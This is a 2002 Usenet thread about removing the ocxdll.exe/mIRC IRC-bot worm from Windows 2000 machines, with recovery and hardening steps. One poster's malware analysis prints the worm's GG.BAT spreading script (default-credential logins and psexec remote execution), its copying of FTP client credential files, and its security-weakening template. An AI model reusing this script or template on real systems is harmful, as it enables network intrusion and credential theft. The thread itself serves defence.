Solution to mIRC and Secedit Virus Networking Problems
Edward Alfert
threads in all 4 related to the recent outbreak of mIRC/Secedit trojan...
Background, one of the largest and best customers of the company that i work
for has a small network consisting of several w2kpro computers networked as
a workgroup. They called me to ask for help after discovering that 1) slow
internet speed, and 2) networking problems. I discovered that at boot, a
program called mIRC (or an altered version of the popular program) was
being loaded as well as running the secedit utility.
After manually removing the trojan files (sorry don't have a complete
list... didn't think about documenting this part), i can reboot the systems
and nothing unusual get loaded in memory or executed. Running Norton
Antivirus 2000 with the latest DAT shows the system is clean (...by the
way, contrary to posts i have seen, before cleaning the system Norton DID
detect the trojan as irc/trojan... i was using DAT dated 8/28/02)...
NOW THE FUN PART....
1) use the backup security database template to restore the system to its
original microsoft defaults. (NOTE...if you upgrade from a previous OS,
this default may not be the default you are used to)...
cd %windir%\security\templates
Secedit /configure /cfg basicwk.inf /db basicwk.sdb /log basicwk.log
/verbose
2) copy /winnt/security/database/secedit.sdb to
/winnt/security/database/secedit-check.sdb
you need to do this because you can't run step #3 against the original
secedit.sdb
3) click on start, run, type mmc and click ok
4) click Console menu, then Add/Remove Snap-In
5) click Add, then double click on "Security and Configuration Analysis" and
"Security Templates", then click close, and ok.
6) right click on "security and configuration analysis" and click on "open
database"... browse to /winnt/security/database/secedit-check.sdb and
select it.
7) right click on "security and configuration analysis" and seclect
"analyzie computer now"
8) browse throught the directory structure and you will see that the
computer is currently configured differently..
Make changes as appropriate for your environment.
For example, a very important option that is probably missing (as caused by
the trojan) is that nobody is allowed to logon to the computer via the
network).
go to "security and configuration analisys"... then "local policy"... then
"user rights assignment"...
The first line... "Access this computer from the network" doesn list any
user or group!... this is definitely NOT the default... the default is to
include the following "Backup Operators, Power users, users,
administrators, everyone"....
Add these, and everything should now be fixed with "workgroup" networking.
If you have any questions, or need further help, reply to this thread
instead of the others... I will be monitoring this thread...
--
Edward Alfert
http://edward.alfert.com/ * http://www.sysadmin.info/
"Choose a job you love, and you will never have to work a day in your life."
- Unknown Sage
Edward Alfert
I forgot to mention that you need to apply your changes...
Right click on "security and configuration analysys" and then "Configure
Computer Now"...
![karl [x y]的個人資料相片](https://lh3.googleusercontent.com/a/default-user=s40-c)
karl [x y]
news:al2vhv$1meprk$1...@ID-143141.news.dfncis.de...
>
> NOW THE FUN PART....
>
> 1) use the backup security database template to restore the system to its
> original microsoft defaults. (NOTE...if you upgrade from a previous OS,
> this default may not be the default you are used to)...
>
> cd %windir%\security\templates
>
> Secedit /configure /cfg basicwk.inf /db basicwk.sdb /log basicwk.log
> /verbose
Good work.
I personally would have imported both setup security.inf followed by
basicwk.inf into a security database and then done the compare using that.
Basicwk.inf by itself only contains a small subset [probably around half] of
the group policy settings that the worm could have changed, not all of them.
If the worm changed a setting that was not in the basicwk.inf, you never
would have found out about it and would not have yet removed it.
Edward Alfert
Thanks for the information... I'll go back and see the other half that i
missed. But I did manually browse the security tree and didn't visually
see any other things that didn't look right to me... I had 2 computers side
by side... One known good that was never infected, and the infected
computers.
aladin
I referenced the steps you wrote in my document. They are nice steps
and most importantly, it was tested and worked for many people. Great
job!
Here is my analysis:
Sorry guys if this is a repeat. I kind of need to make a correction
on the steps to restore security templates, and I just referenced
Edward Alfert's instructions:
More Analysis on ocxdll.exe virus: v. 1.1
Kyle Lai, CISSP, CISA
alad...@hotmail.com
+++++++++++++++++++++
This is a SMB over TCP attack, using port 445. It looked for
vulnerability in weak administrator id and passwords on the local
Windows 2000 systems.
+++++++++++++++++++++
One of my clients also got infected with ocxdll.exe virus. This
occurred back in 8/28/2002 at 3am. After some detailed analysis, I
have determined that it was a Trojan, deleted the detected registry
entries, deleted the infected files, tightened the local administrator
ID and password, restored the security policy by running "secedit.exe
/configure" (from Microsoft) to restore the security policy (If they
have a backup .sdb file, then just reapply the security policy would
fix this part), added users /groups back to "Access this computer from
the network" policy . The cause was due to bad security (admin ID and
passwords), and firewall, and possibly a backdoor.
Effected systems:
- Windows 2000, XP (same port, 445, but not tested yet). Security
policiesalteration was ONLY for Windows 2000 (and maybe on XP)
- Windows NT – might be infected as the "root problem" to spread the
trojan, but it will not get this Trojan base on its re-distribution
method. You probably want to look into this system to determine if
there are any backdoors, Trojans, or if this system wascompromised in
any way. It will not change security policies.
What did it do?
++++++++++++
1. hide all programs it ran.
2. Run mIRC client with random usernames listed in mdm.scr with more
random characters
3. open backdoor, port 60609
4. It ran the bot (robot) scripts in the following order, which means
they contained
malicious automated instructions.
[rfiles]
n0=nt32.ini
n1=dll16.ini
n2=nt32.ini
n3=dll32nt.hlp
n4=xvpll.hlp
n5=dll32.hlp
n6=httpsearch.ini.
5. Replace security policy settings using Microsoft security editor
(SecEdit.exe/configure) command and reset the security policy to
default settings, and replace some additional security settings using
the TFT8675 file. This is done in quiet mode so itprobably only
flashed the command line window very quickly.
6. It scans for 25 IP's and then start running "GG.BAT". GG.BAT is
the REAL program that started the hacking.
7. It tries to hack into the system using the following user ID and
password. If
you don't have these user id and passwords, maybe you are just
infected with 1 system,
and it could not spread via this Trojan/worm.
a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password
8. If you have some guessable administrator id and passwords, then
probably these systems were hacked successfully. It copied the Trojan
OCXDLL.EXE to the compromised systems. If file were there, copy it
anyway, and do it quietly. (using psexec.exe –c –f -d)
9. Run the OCXDLL.EXE without any delay (psexec.exe –d), which
extracted the 17 files that are in this self-extracted file.
10. It tries to copy "c:\progra~1\flashfxp\sites.dat" and
"c:\progra~1\ws_ftp\ws_ftp.ini" to "c:\windows\system32" directory.
(maybe get the configuration from the bot?)
11. Start the "taskmngr.exe" which was really a Mirc.EXE, an irc
client.
12. The scripts were kicked in to HIDE the mirc window, so you can
ONLY see it in the process. You will see "taskmngr.exe" (NOT
taskmgr.exe, which is the REAL task manager)
13. xvpll.hlp reports Trojan status back to the hacker. Either
attempt failed or attempt successful.
++++++++++++
Disclaimer: The irc bot scripts have not fully analyzed. This is
what I understood so far. The removal instructions WILL remove the
trojan.
++++++++++++
Impact:
+++++++++++++
This may be a random attack. However, there is a file, ncp.exe
involved, which is the NetCat program. This program allows the
hackers to gain full control to your system.
Therefore,
1. Best-case scenario is that it was a hack, and no sensitive data
were lost.
2. Worst-case scenario is that they have controlled your system and
implemented something new that are not yet detected.
3. The hacker has captured your IP address and knows that you were
vulnerable because the Trojan actually reported back to him/her.
+++++++++++++
How to remove the Trojan:
++++++++++++++++++++
1. Delete files that were extracted from ocxdll.exe, plus ocxdll.exe
and dll16.ini
(created when running mirc.exe)
Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
++++++++++++
****NOTE:
seced.bat is a decoy. This file was never used. The real instruction
for updating the
configuration was mentioned in item #5.
v.exe is actually srvany.exe, which is another decoy. It was never
used.
++++++++++++
2. Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run,
remove "taskmngr.exe" (this starts mirc client program during the
windows startup)
3. Change the LOCAL Administrator password on ALL Systems! This
includes Windows 2000 PROESSIONAL! Make sure the new passwords are
strong passwords! Use mix of Uppercase, Lowercase, numbers, and
non-alphanumeric, i.e. _,+,=,), … for your newpasswords, and make sure
the passwords are NOT similar to the administrator ID in any way. For
example, "Administrator123" is a very bad password, even it has mix
cases and alphanumeric.
4. If possible, change Administrator login ID to a different user_id.
This will stop the initial user_id guessing. (This will not stop the
more sophisticated hackers)
5. Restore the default security policy by restoring the basic
Microsoft default security template. The following instruction for
restoring basic default security template is from the USENET posting
by Edward Alfert (edw...@alfert.com) under topic "Solution to mIRC
and Secedit Virus Networking Problems." in
microsoft.public.scripting.virus.discussion.. More info on Microsoft
Security configuration and analysis can be found at
http://www.microsoft.com/windows2000/en/advanced/help/default.asp?url=/windows2000/en/advanced/help/SCE_newconfig.htm
Here are the instructions from Edward Alfert.
================
cd %windir%\security\templates
================
6. Goto start -> programs -> administrative tools -> Local Security
Policy, click on
"User Rights Assignments", and add users and groups back into the
policy. "Access this
computer from the network". The default setting is:
a. IWAM_[SYSTEM_NAME]
b. ADMINISTRATORS
c. BACKUP OPERATORS
d. POWER USERS
e. USERS
f. EVERYONE
g. IUSR_[ SYSTEM_NAME]
7. You MUST go through the security policies and make sure proper
access were restored. You or some of your applications might have
specific rights settings prior to the compromise, and the user/group
privilage/rights need to be reset if necessary.
8. You probably have seen a strange SID that was added by the trojan
in the "Logon Locally" policy. Remove the user SID. The SID there does
NOT mean the trojan created a user. It was in the security template on
TFTP8675 file. You can see it on the bottom of this document.
Additional Recommendation
1. Tighten your Firewall and lock down the ports and ACL, BOTH inside
to outside, and outside to inside. Make sure port TCP/UDP 445 is
blocked both inbound and outbound on the firewall.
2. If possible, Rename your administrator user id to something else,
and create a user id called "Administrator" with NO GROUPS associated
with it. This will allow you to monitor anyone from trying to use the
"Administrator" login.
3. Setup the security event log. Log successful and failed
Logon/Logoff to audit system access. Make sure to monitor the event
logs.
++++++++++++++++++++
More details:
Infection:
registry entries
- Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run,
remove "taskmngr.exe"
(this starts mirc client program during the windows startup)
When MIRC client started running, it ran the scripts in dll32nt.hlp,
which in fact ran "secedit /configure /DB secedit.sdb /cfg $mircdir $+
tftp8675 /quiet". This meant
"configure your system setting with the existing security policy in
secedit.sdb, plus the additional settings in tftp8675". It basically
removed many security restrictions, remove all audits for the systems,
and of course remove all users in the "Local Users allowed from the
net".
OCXDLL.EXE is a self-extracted file that included 17 files. It is a
Trojan/worm. In the dll32nt.hlp, it has an instruction to do IP scan,
and store the 25 IP address it found. Mostly likely it scanned the
subnet and file servers that were connected to the compromised system
at that time. Then the Trojan has an instruction at the end to run
GG.BAT, which is the instruction to attack the 25 IP's it just found.
Then the process started all over again.
Here are the files that were extracted from ocxdll.exe:
+++++++++++++++++++++++
ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
++++++++++++++++++++++++
Here is the GG.BAT text:
------------------------
@echo off
net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat
c:\winnt\system32\w%1.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini
c:\winnt\system32\w%1.ini
psexec \\%1 -d taskmngr.exe
------------------------
-------------------------------------
from SysInternals, here is the description of what the PSEXEC
parameters do:
-c = Copy the specified program to the remote system for execution. If
you omit this option then the application must be in the system's path
on the remote system.
-f = Copy the specified program to the remote system even if the file
already exists on the remote system.
-d = Don't wait for application to terminate. Only use this option for
non-interactive applications.
---------------------------------------
List from TFTP8675:
----------------------
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
[Registry Values]
machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1
machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1
machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0
machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0
machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0
machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0
machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1
machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0
machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0
machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0
machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1
machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15
machine\system\currentcontrolset\control\session
manager\protectionmode=4,1
machine\system\currentcontrolset\control\session manager\memory
management\clearpagefileatshutdown=4,0
machine\system\currentcontrolset\control\print\providers\lanman print
services\servers\addprinterdrivers=4,0
machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0
machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0
machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0
machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0
machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0
machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1
machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1,
machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1,
machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0
machine\software\microsoft\windows
nt\currentversion\winlogon\scremoveoption=1,0
machine\software\microsoft\windows
nt\currentversion\winlogon\passwordexpirywarning=4,14
machine\software\microsoft\windows
nt\currentversion\winlogon\cachedlogonscount=1,10
machine\software\microsoft\windows
nt\currentversion\winlogon\allocatefloppies=1,0
machine\software\microsoft\windows
nt\currentversion\winlogon\allocatedasd=1,0
machine\software\microsoft\windows
nt\currentversion\winlogon\allocatecdroms=1,0
machine\software\microsoft\windows
nt\currentversion\setup\recoveryconsole\setcommand=4,0
machine\software\microsoft\windows
nt\currentversion\setup\recoveryconsole\securitylevel=4,0
[Privilege Rights]
seassignprimarytokenprivilege =
seauditprivilege =
sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551
sebatchlogonright =
sechangenotifyprivilege =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0
secreatepagefileprivilege = *S-1-5-32-544
secreatepermanentprivilege =
secreatetokenprivilege =
sedebugprivilege = *S-1-5-32-544
sedenybatchlogonright =
sedenyinteractivelogonright =
sedenynetworklogonright =
sedenyservicelogonright =
seenabledelegationprivilege =
seincreasebasepriorityprivilege = *S-1-5-32-544
seincreasequotaprivilege = *S-1-5-32-544
seinteractivelogonright =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501
seloaddriverprivilege = *S-1-5-32-544
selockmemoryprivilege =
semachineaccountprivilege =
senetworklogonright = Microsoft
seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547
seremoteshutdownprivilege = *S-1-5-32-544
serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551
sesecurityprivilege = *S-1-5-32-544
seservicelogonright =
seshutdownprivilege =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545
sesyncagentprivilege =
sesystemenvironmentprivilege = *S-1-5-32-544
sesystemprofileprivilege = *S-1-5-32-544
sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547
setakeownershipprivilege = *S-1-5-32-544
setcbprivilege =
--------------------------
Alison Taylor
have attempted to carry out all your suggestions since my computer was
infected several days ago.
I have some lingering problems and am wondering if anyone else has
seen these and can suggest fixes. The most notable problem is that my
computer reboots during bootup. The Win2000 login prompt comes up ok
and I log in to my account (which has administrator privileges, dont
know if that is relevant). Then the programs with incons in the
taskbar launch. During the launching of these programs, or
immediately after, the computer then reboots.
Another thing I noted was in the registry. Under
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run there
is an entry "Adobea" which was pointing to
C:winnt\system32\adobes.exe, which Norton AntiVirus had identifies as
and IRC Trojan. There does exist a file called Adobea.exe in the
system32 directory, but I don't know whether it is also a
trojan-created file or whether it needs to be there. I currently have
the adobea entry pointing to a non-existent file till I have this
sorted out.
I am not familiar enough with all the services to know which should be
disabled and which should be enabled. I am guessing that during my
attempts to rollback the changes made by the virus I have messed up my
services and registry settings, causing the crash on startup. I don't
need to allow anyone to log in remotely or provide any services to
remote users. Can anyone out there suggest a minimal list of services
to run?
Thanks for any replies,
Alison
alad...@hotmail.com (aladin) wrote in message news:<bf0f8e77.02090...@posting.google.com>...
Brian Mulrooney
"Alison Taylor" <alison...@canada.com> wrote in message
news:3c990e53.02092...@posting.google.com...
aladin
I had a follow-up posting regarding the ocxdll.exe couple weeks ago.
You can follow the additional suggestions in that posting. Make sure
you use some Anti-Trojan software to detect and clean up your system.
Anti-Virus software does not pick up many IRC related trojans.
I like the Free Anti-Trojan software, SWAT-IT, by Lockdown Corp
(www.lockdowncorp.com.) Try it out. It should help you a lot in
terms of fighting trojans.
In terms of removing trojans, I definitely think you should rename the
suspected trojan file, and remove the registry entry "Adobea"
If possible, can you please send me the adobes.exe at ky...@kylelai.com
for analysis? Thanks!
Good luck!
/Kyle
Kyle Lai, CISSP, CISA, MCSE
Information Security Consultant
Kyle Lai Consulting
508-380-2022
ky...@kylelai.com
alison...@canada.com (Alison Taylor) wrote in message news:<3c990e53.02092...@posting.google.com>...
aladin
follow-up to Microsoft Knowledge Base Article - Q328691. You can find
it at:
http://groups.google.com/groups?hl=en&lr=&ie=UTF-8&oe=UTF-8&threadm=bf0f8e77.0209080706.7f395b0c%40posting.google.com&rnum=1&prev=/groups%3Fhl%3Den%26lr%3D%26ie%3DUTF-8%26oe%3DUTF-8%26q%3Dkyle%2Blai%2Bknowledge%2Bbase%26sa%3DN%26tab%3Dwg